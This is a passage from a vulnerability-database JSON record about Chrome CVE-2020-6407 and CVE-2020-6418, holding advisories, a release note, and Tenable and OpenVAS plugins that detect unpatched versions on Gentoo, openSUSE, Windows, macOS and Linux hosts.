'>=www-client/google-chrome-80.0.3987.132'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:google-chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 80.0.3987.132\"), vulnerable:make_list(\"lt 80.0.3987.132\"))) flag++;\nif (qpkg_check(package:\"www-client/google-chrome\", unaffected:make_list(\"ge 80.0.3987.132\"), vulnerable:make_list(\"lt 80.0.3987.132\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium / Google Chrome\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-07-28T14:33:59", "description": "Arch Linux Security Advisory ASA-202002-11\n==========================================\n\nSeverity: High\nDate : 2020-02-25\nCVE-ID : CVE-2020-6407 CVE-2020-6418\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1102\n\nSummary\n=======\n\nThe package chromium before version 80.0.3987.122-1 is vulnerable to\nmultiple issues including arbitrary code execution and information\ndisclosure.\n\nResolution\n==========\n\nUpgrade to 80.0.3987.122-1.\n\n# pacman -Syu \"chromium>=80.0.3987.122-1\"\n\nThe problems have been fixed upstream in version 80.0.3987.122.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-6407 (information disclosure)\n\nAn out-of-bounds memory access vulnerability has been found in the\nstreams component of chromium before 80.0.3987.122.\n\n- CVE-2020-6418 (arbitrary code execution)\n\nA type confusion vulnerability has been found in the V8 component of\nchromium before 80.0.3987.122.\n\nImpact\n======\n\nA remote attacker can access sensitive information or execute arbitrary\ncode on the affected host.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\nhttps://crbug.com/1045931\nhttps://crbug.com/1053604\nhttps://security.archlinux.org/CVE-2020-6407\nhttps://security.archlinux.org/CVE-2020-6418", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-25T00:00:00", "type": "archlinux", "title": "[ASA-202002-11] chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-25T00:00:00", "id": "ASA-202002-11", "href": "https://security.archlinux.org/ASA-202002-11", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "chrome": [{"lastseen": "2021-12-30T22:31:46", "description": "The stable channel has been updated to 80.0.3987.122 for Windows, Mac, and Linux, which will roll out over the coming days/weeks. \n\n\n\n\n\n\nA list of all changes is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/80.0.3987.116..80.0.3987.122?pretty=fuller&n=10000>). Interested in switching release channels? [ Find out how](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues. \n\n\n\n\n**Security Fixes and Rewards** \n\n\n\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n** \n** \n\n\nThis update includes [3](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call+label%3ARelease-3-M80>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n** \n** \n\n\n[$5000][[1044570](<https://crbug.com/1044570>)] High: Integer overflow in ICU. Reported by Andr\u00e9 Bargull (with thanks to Jeff Walden from Mozilla) on 2020-01-22\n\n[N/A][[1045931](<https://crbug.com/1045931>)] High CVE-2020-6407: Out of bounds memory access in streams. Reported by Sergei Glazunov of Google Project Zero on 2020-01-27\n\n** \n** \n\n\nThis release also contains:\n\n[N/A][[1053604](<https://crbug.com/1053604>)] High CVE-2020-6418: Type confusion in V8. Reported by Clement Lecigne of Google's Threat Analysis Group on 2020-02-18\n\n** \n** \n\n\nGoogle is aware of reports that an exploit for CVE-2020-6418 exists in the wild.\n\n** \n** \n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.\n\n\n\n\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>).\n\n\n\n\n\n\n\n\n\n\n\n\n\nKrishna Govind \nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-24T00:00:00", "id": "GCSA-2415374810976728715", "href": "https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-03-04T16:40:33", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-02-25T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-03-03T00:00:00", "id": "OPENVAS:1361412562310816586", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816586", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816586\");\n script_version(\"2020-03-03T07:50:03+0000\");\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-03 07:50:03 +0000 (Tue, 03 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-25 17:55:24 +0530 (Tue, 25 Feb 2020)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An out of bounds memory access in streams.\n\n - A type confusion in V8.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or crash affected system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 80.0.3987.122\n on MAC OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 80.0.3987.122 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"80.0.3987.122\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"80.0.3987.122\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-04T16:38:45", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-02-25T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-03-03T00:00:00", "id": "OPENVAS:1361412562310816584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816584", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816584\");\n script_version(\"2020-03-03T07:50:03+0000\");\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-03 07:50:03 +0000 (Tue, 03 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-25 17:55:24 +0530 (Tue, 25 Feb 2020)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An out of bounds memory access in streams.\n\n - A type confusion in V8.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or crash affected system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 80.0.3987.122\n on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 80.0.3987.122 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"80.0.3987.122\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"80.0.3987.122\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-04T16:38:44", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-02-25T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-03-03T00:00:00", "id": "OPENVAS:1361412562310816585", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816585", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816585\");\n script_version(\"2020-03-03T07:50:03+0000\");\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-03 07:50:03 +0000 (Tue, 03 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-25 17:55:24 +0530 (Tue, 25 Feb 2020)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An out of bounds memory access in streams.\n\n - A type confusion in V8.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or crash affected system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 80.0.3987.122\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 80.0.3987.122 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"80.0.3987.122\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"80.0.3987.122\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-04T16:37:26", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-02-28T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for chromium (openSUSE-SU-2020:0259-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-03-03T00:00:00", "id": "OPENVAS:1361412562310853048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310853048", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.853048\");\n script_version(\"2020-03-03T07:50:03+0000\");\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-03 07:50:03 +0000 (Tue, 03 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-28 04:01:58 +0000 (Fri, 28 Feb 2020)\");\n script_name(\"openSUSE: Security Advisory for chromium (openSUSE-SU-2020:0259-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2020:0259-1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00033.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the openSUSE-SU-2020:0259-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for chromium fixes the following issues:\n\n Chromium was updated to version 80.0.3987.122 (bsc#1164828).\n\n Security issues fixed:\n\n - CVE-2020-6418: Fixed a type confusion in V8 (bsc#1164828).\n\n - CVE-2020-6407: Fixed an OOB memory access in streams (bsc#1164828).\n\n - Fixed an integer overflow in ICU (bsc#1164828).\n\n Non-security issues fixed:\n\n - Dropped the sandbox binary as it should not be needed anymore\n (bsc#1163588).\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-259=1\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T19:50:56", "description": "This host is missing a critical security\n update according to Microsoft KB4550964", "cvss3": {}, "published": "2020-04-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550964)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0967", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0993", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-1000", "CVE-2020-1011", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-0957", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310816823", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816823", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816823\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0821\", \"CVE-2020-0889\", \"CVE-2020-0895\",\n \"CVE-2020-0938\", \"CVE-2020-0946\", \"CVE-2020-0952\", \"CVE-2020-0953\",\n \"CVE-2020-0955\", \"CVE-2020-0956\", \"CVE-2020-0957\", \"CVE-2020-0958\",\n \"CVE-2020-0959\", \"CVE-2020-0960\", \"CVE-2020-0962\", \"CVE-2020-0964\",\n \"CVE-2020-0965\", \"CVE-2020-0966\", \"CVE-2020-0967\", \"CVE-2020-0968\",\n \"CVE-2020-0982\", \"CVE-2020-0987\", \"CVE-2020-0988\", \"CVE-2020-0992\",\n \"CVE-2020-0993\", \"CVE-2020-0994\", \"CVE-2020-0995\", \"CVE-2020-0999\",\n \"CVE-2020-1000\", \"CVE-2020-1004\", \"CVE-2020-1005\", \"CVE-2020-1007\",\n \"CVE-2020-1008\", \"CVE-2020-1009\", \"CVE-2020-1011\", \"CVE-2020-1014\",\n \"CVE-2020-1015\", \"CVE-2020-1020\", \"CVE-2020-1027\", \"CVE-2020-1094\",\n \"CVE-2020-0907\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550964)\");\n\n 